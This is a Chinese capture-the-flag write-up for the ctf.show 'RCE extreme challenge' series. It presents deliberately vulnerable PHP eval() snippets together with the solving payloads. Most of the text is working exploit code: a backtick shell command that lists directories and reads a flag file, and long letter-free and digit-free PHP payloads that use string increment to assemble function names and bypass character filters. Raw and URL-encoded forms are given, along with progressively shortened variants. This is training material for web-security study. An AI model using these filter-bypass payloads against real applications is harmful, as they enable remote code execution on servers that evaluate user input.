RCE极限挑战

https://ctf-show.feishu.cn/docx/ToiJd70SboRn52xhn3WcJsfjnah

RCE挑战1

源码：

<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","括号",$code);
$code = str_replace(".","点",$code);
eval($code);
?>

题解：

code=echo `ls;cd /;ls;cat f1agaaa;`;

RCE挑战2

源码：

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势，太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow)) {
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

过程：

！$ ' () + , . ; = / _[]

过程1-assert

思路1-assert

思路2-eval

思路3-phpinfo

python脚本

题解：

$_[]='_';$_=$_.'';$_=$_['!'=='$'];$__=$_;$___='';$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$____='_';$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$_=$$____;($___)($_[_]);
ctf_show=%24_%5B%5D%3D'_'%3B%24_%3D%24_.''%3B%24_%3D%24_%5B'!'%3D%3D'%24'%5D%3B%24__%3D%24_%3B%24___%3D''%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___.%3D%24__%3B%24____%3D'_'%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24____.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24____.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24____.%3D%24__%3B%24__%3D%24_%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B(%24___)(%24_%5B_%5D)%3B&_=ls;cd /;ls;cat f1agaaa;
_=ls;cd /;ls;cat f1agaaa;

RCE挑战3

/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/
/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/
/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/
$() + , . / ；= _[]
$_[]=1;$_=$_.$_;$_=$_[0==1];$__=$_;$___='';$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;$___.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___.=$__;$____='_';$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$__=$_;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$____.=$__;$_=$$____;($___)($_[_]);
$η.$ν.$η.$θ.$Ω.$α.$λ
缩短变量字母长度
αβγδεζηθ 西塔， ι 约塔， κ 卡帕， λ 兰姆达，μ 米欧 ，ν 纽， ξ 克西， ο 欧米克隆， π 派， ρ 柔 ，σ 西格玛， τ 陶 ，υ 玉普西隆， φ 弗爱， χ 凯， ψ 普赛
$_=[].[];
$_=$_[0==1];
$_++;$_++;$_++;
$α=++$_;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$β=++$_;
$_++;
$γ=++$_;
$δ=++$_;
$_++;$_++;
$ε=++$_;
$ζ=++$_;
$η=++$_;
$_++;$_++;$_++;
$θ=++$_;
echo $α.$β.$γ.$δ.$ε.$ζ.$θ;
eval
popen
get
exec
strlen长度绕过

WP题解：3-4-5

$_=((0/0)._)[0];//16
$α=++$_;//8
$β=++$_;//8
++$_;++$_;//10
$σ=_.$β.$α.++$_.++$_;//20
$$σ[0]($$σ[1]);//15

$_=((0/0)._)[0];$α=++$_;$β=++$_;++$_;++$_;$σ=_.$β.$α.++$_.++$_;$$σ[0]($$σ[1]);//85

$_=((0/0)._)[0];//16
$α=++$_;//8
$β=++$_;//8
++$_;++$_;//10
$_=_.$β.$α.++$_.++$_;//20
$$_[0]($$_[_]);//15

$_=((0/0)._)[0];$α=++$_;$β=++$_;++$_;++$_;$_=_.$β.$α.++$_.++$_;$$_[0]($$_[_]);//82

$_=_(a/a)[a];++$_;$a=$_.$_++;++$_.++$_;$_=_.$a.++$_.++$_;$$_[b]($$_[_]);
%24_%3D_(%ff%2F%ff)%5B%ff%5D%3B%2B%2B%24_%3B%24%ff%3D%24_.%24_%2B%2B%3B%2B%2B%24_.%2B%2B%24_%3B%24_%3D_.%24%ff.%2B%2B%24_.%2B%2B%24_%3B%24%24_%5B%fe%5D(%24%24_%5B_%5D)%3B